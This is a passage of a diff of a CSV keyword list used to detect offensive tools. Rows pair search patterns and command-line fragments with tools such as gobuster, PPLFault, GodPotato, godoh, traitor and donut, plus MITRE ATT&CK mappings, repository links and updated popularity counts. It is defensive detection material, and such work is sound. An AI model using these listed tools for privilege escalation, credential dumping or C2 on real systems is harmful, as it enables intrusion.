Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" -"*GMShellcode\*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" -"*go get -u *traitor/cmd/traitor*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*GMShellcode*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*GMShellcode.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*GMShellcode\*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*go get -u *traitor/cmd/traitor*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","0","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" "*go run poc.go check -t http://*:8080 -u Admin*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/trganda/CVE-2022-23131","1","0","N/A","N/A","1","1","1","2022-02-24T11:50:28Z","2022-02-24T08:10:46Z" "*go run scannerPort.go*","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/GONET-Scanner","1","0","N/A","N/A","1","72","18","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z" "*go_shellcode_encode.py*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","1","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z" -"*gobfuscate*","offensive_tool_keyword","gobfuscate","When you compile a Go binary. it contains a lot of information about your source code: field names. strings. package paths. etc. If you want to ship a binary without leaking this kind of information. what are you to do? With gobfuscate. you can compile a Go binary from obfuscated source code. This makes a lot of information difficult or impossible to decipher from the binary.","T1027 - T1029 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/unixpickle/gobfuscate","1","0","N/A","N/A","10","1362","190","2021-12-07T22:27:26Z","2016-10-01T20:40:37Z" -"*gobuster dir *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobfuscate*","offensive_tool_keyword","gobfuscate","When you compile a Go binary. it contains a lot of information about your source code: field names. strings. package paths. etc. If you want to ship a binary without leaking this kind of information. what are you to do? With gobfuscate. you can compile a Go binary from obfuscated source code. This makes a lot of information difficult or impossible to decipher from the binary.","T1027 - T1029 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/unixpickle/gobfuscate","1","0","N/A","N/A","10","1362","191","2021-12-07T22:27:26Z","2016-10-01T20:40:37Z" +"*gobuster dir *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" "*gobuster dir -w *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*gobuster dns*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*gobuster fuzz -*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*gobuster gcs *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*gobuster s3 *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*gobuster tftp *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*gobuster vhost -u *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*gobuster vhost*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*gobuster*","offensive_tool_keyword","gobuster","Gobuster is a tool used to brute-force","T1110 - T1114 - T1115 - T1107","TA0001 - TA0007","N/A","N/A","Exploitation tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*gobuster_*.tar.gz*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*gobuster_*.zip*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*gobusterfuzz*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*gobustertftp*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8199","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" -"*gocrack@password.crackers.local*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" -"*gocrack_v*_darwin_x64_hashcat_v3_6_0.zip*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" -"*gocrack_v*_linux_x64_hashcat_v3_6_0.zip*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1074","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" -"*GodFault.exe*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" -"*GodFault\GodFault*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*gobuster dns*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster fuzz -*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster gcs *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster s3 *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster tftp *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster vhost -u *","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster vhost*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","0","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster*","offensive_tool_keyword","gobuster","Gobuster is a tool used to brute-force","T1110 - T1114 - T1115 - T1107","TA0001 - TA0007","N/A","N/A","Exploitation tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster_*.tar.gz*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobuster_*.zip*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobusterfuzz*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gobustertftp*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*gocrack@password.crackers.local*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","0","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*gocrack_v*_darwin_x64_hashcat_v3_6_0.zip*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*gocrack_v*_linux_x64_hashcat_v3_6_0.zip*","offensive_tool_keyword","gocrack","GoCrack is a management frontend for password cracking tools written in Go","T1110 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/mandiant/gocrack","1","1","N/A","9","10","1076","271","2023-10-03T21:43:08Z","2017-10-23T14:43:59Z" +"*GodFault.exe*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*GodFault\GodFault*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*godoh -*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" "*godoh agent*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" "*godoh c2*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" @@ -10966,27 +11117,27 @@ "*godoh-linux64*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" "*godoh-windows32.*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" "*godoh-windows64.*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z" -"*go-donut/*.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*go-donut/*.go*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*GodPotato -*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1186","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" -"*GodPotato.cs*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1186","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" -"*godpotato.exe*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1186","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" -"*GodPotato.git*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1186","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" -"*GodPotatoContext.cs*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1186","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" -"*GodPotato-master.zip*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1186","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" -"*GodPotato-NET*.exe*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1186","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" -"*GodPotatoUnmarshalTrigger.cs*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","1186","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*go-donut/*.exe*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*go-donut/*.go*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*GodPotato -*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","1192","179","2023-06-25T05:20:26Z","2022-12-23T14:37:00Z" +"*GodPotato.cs*","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege 